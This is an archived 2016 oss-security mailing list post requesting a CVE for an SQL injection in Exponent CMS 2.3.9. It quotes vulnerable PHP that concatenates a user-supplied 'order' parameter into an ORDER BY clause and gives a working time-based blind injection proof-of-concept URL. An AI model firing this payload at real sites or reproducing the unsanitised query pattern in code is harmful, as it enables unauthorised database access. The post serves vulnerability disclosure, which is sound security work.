Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAJ8RaNZJHLm59Hc5TZQOBX-DdohC1FG00YWd_yS56QmNHAggig@mail.gmail.com>
Date: Mon, 19 Sep 2016 08:17:53 -0400
From: 王禹哲 <0xtom4to@...il.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: CVE request - Exponent CMS 2.3.9 SQL injection

Author: Tomato jianing.wang@...itin.com

Data: 2016–09–19

Version: 2.3.9 and earlier

/exponent–2.3.9/framework/core/subsystems/expPaginator.php


if (strstr($this->order," ")) {
            $orderby = explode(" ",$this->order);
            $this->order = $orderby[0];
            $this->order_direction = $orderby[1];
        }
        if ($this->dontsort)
            $sort = null;
        else
            $sort = $this->order.' '.$this->order_direction;

        // figure out how many records we're dealing with & grab the records
        //if (!empty($this->records)) { //from Merge <~~ this doesn't
work. Could be empty, but still need to hit.
        if (!empty($this->categorize))
            $limit = null;
        else
            $limit = $this->limit;

        if (isset($params['records'])) { // if we pass
$params['records'], we WANT to hit this
            // sort the records that were passed in to us
            if (!empty($sort))
                usort($this->records,array('expPaginator',
strtolower($this->order_direction)));
//          $this->total_records = count($this->records);
        } elseif (!empty($class)) { //where clause     //FJD: was
$this->class, but wasn't working...
            $this->total_records = $class->find('count', $this->where);
            $this->records = $class->find('all', $this->where, $sort,
$limit, $this->start);
        } elseif (!empty($this->where)) { //from Merge....where clause
            $this->total_records = $class->find('count', $this->where);
            $this->records = $class->find('all', $this->where, $sort,
$limit, $this->start);
        } else { //sql clause  //FIXME we don't get attachments in this approach
            //$records = $db->selectObjectsBySql($this->sql);
            //$this->total_records = count($records);
            //this is MUCH faster if you supply a proper count_sql
param using a COUNT() function; if not,
            //we'll run the standard sql and do a queryRows with it
            //$this->total_records = $this->count_sql == '' ?
$db->queryRows($this->sql) : $db->selectValueBySql($this->count_sql);
//From Merge

//          $this->total_records =
$db->countObjectsBySql($this->count_sql);
//$db->queryRows($this->sql); //From most current Trunk

            if (!empty($sort)) $this->sql .= ' ORDER BY '.$sort;


i can controller $order ,i can use this parameter to sql injection

such as

exponent–2.3.9/framework/modules/company/controllers/companyController.php


function showall() {
        expHistory::set('viewable', $this->params);
        $page = new expPaginator(array(
            'model'=>$this->basemodel_name,
            'where'=>1,
            'limit'=>(isset($this->params['limit']) &&
$this->config['limit'] != '') ? $this->params['limit'] : 10,
            'order'=>isset($this->params['order']) ?
$this->params['order'] : 'rank',
            'page'=>(isset($this->params['page']) ? $this->params['page'] : 1),
            'controller'=>$this->baseclassname,
            'action'=>$this->params['action'],
            'columns'=>array(
                gt('Manufacturer')=>'title',
                gt('Website')=>'website'
            ),
        ));

        assign_to_template(array(
            'page'=>$page,
            'items'=>$page->records
        ));
    }


the poc is

http://127.0.0.1/exponent-2.3.9/index.php?controller=company&action=showall&limit=1&order=(select/**/*/**/from/**/(select/**/sleep(5))x)%23

in the mysql log we can see this

SELECT * FROM exponent_companies WHERE 1 ORDER BY
(select/**/*/*/from/*/(select/**/sleep(5))x)#
ASC LIMIT 0,10

Could you assign CVE id for this?

Regards,

Tomato

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.